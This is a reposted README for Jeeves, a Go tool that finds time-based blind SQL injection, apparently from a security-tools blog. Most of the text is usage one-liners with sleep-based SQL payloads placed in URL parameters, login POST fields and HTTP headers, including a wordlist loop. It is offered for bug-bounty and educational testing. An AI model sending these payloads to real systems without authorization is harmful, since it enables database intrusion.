Jeeves - Time-Based Blind SQLInjection Finder

2 years ago 164
BOOK THIS SPACE FOR AD
ARTICLE AD

Jeeves is made for looking to Time-Based Blind SQLInjection through recon.

- Installation & Requirements:

Installing Jeeves

OR

$ git clone https://github.com/ferreiraklet/Jeeves.git
$ cd Jeeves
$ go build jeeves.go
$ chmod +x jeeves
$ ./jeeves -h

- Usage & Explanation:

In Your recon process, you may find endpoints that can be vulnerable to sql injection, Ex: https://redacted.com/index.php?id=1

Single urls

echo 'https://redacted.com/index.php?id=your_time_based_blind_payload_here' | jeeves -t payload_time
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(10)))v)" | jeeves -t 10

In --payload-time you must use the time mentioned in payload


From list

cat targets | jeeves --payload-time 5

Adding Headers

Pay attention to the syntax! Must be the same =>

echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -H "Testing: testing;OtherHeader: Value;Other2: Value"

Using proxy

echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 --proxy "http://ip:port"
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -p "http://ip:port"

Proxy + Headers =>

echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5 --proxy "http://ip:port" -H "User-Agent: xxxx"

Post Request

Sending data through post request ( login forms, etc )

Pay attention to the syntax! Must be equal! ->

echo "https://example.com/Login.aspx" | jeeves -t 10 -d "user=(select(0)from(select(sleep(5)))v)&password=xxx"
echo "https://example.com/Login.aspx" | jeeves -t 10 -H "Header1: Value1" -d "username=admin&password='+(select*from(select(sleep(5)))a)+'" -p "http://yourproxy:port"

Another ways of Usage

You are able to use of Jeeves with other tools, such as gau, gauplus, waybackurls, qsreplace and bhedak, mastering his strenght


Command line flags:

traffic to a proxy -c Set Concurrency, Default 25 -H, --headers Custom Headers -d, --data Sending Post request with data -h Show This Help Message">

Usage:
-t, --payload-time, The time from payload
-p, --proxy Send traffic to a proxy
-c Set Concurrency, Default 25
-H, --headers Custom Headers
-d, --data Sending Post request with data
-h Show This Help Message

Using with sql payloads wordlist

cat sql_wordlist.txt | while read payload;do echo http://testphp.vulnweb.com/artists.php?artist= | qsreplace $payload | jeeves -t 5;done

Testing in headers

echo "https://target.com" | jeeves -H "User-Agent: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10
echo "https://target.com" | jeeves -H "X-Forwarded-For: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10

Payload credit: https://github.com/rohit0x5

OBS:

Does not follow redirects, If the Status Code is diferent than 200, it returns "Need Manual Analisys" Jeeves does not http probing, he is not able to do requests to urls that does not contain protocol ( http://, https:// )

This project is for educational and bug bounty porposes only! I do not support any illegal activities!.

If any error in the program, talk to me immediatly.

Please, also check these =>

Nilo - Checks if URL has status 200

SQLMAP

Blisqy Header time based SQLI

Jeeves - Time-Based Blind SQLInjection Finder Jeeves - Time-Based Blind SQLInjection Finder Reviewed by Zion3R on 5:30 PM Rating: 5

Read Entire Article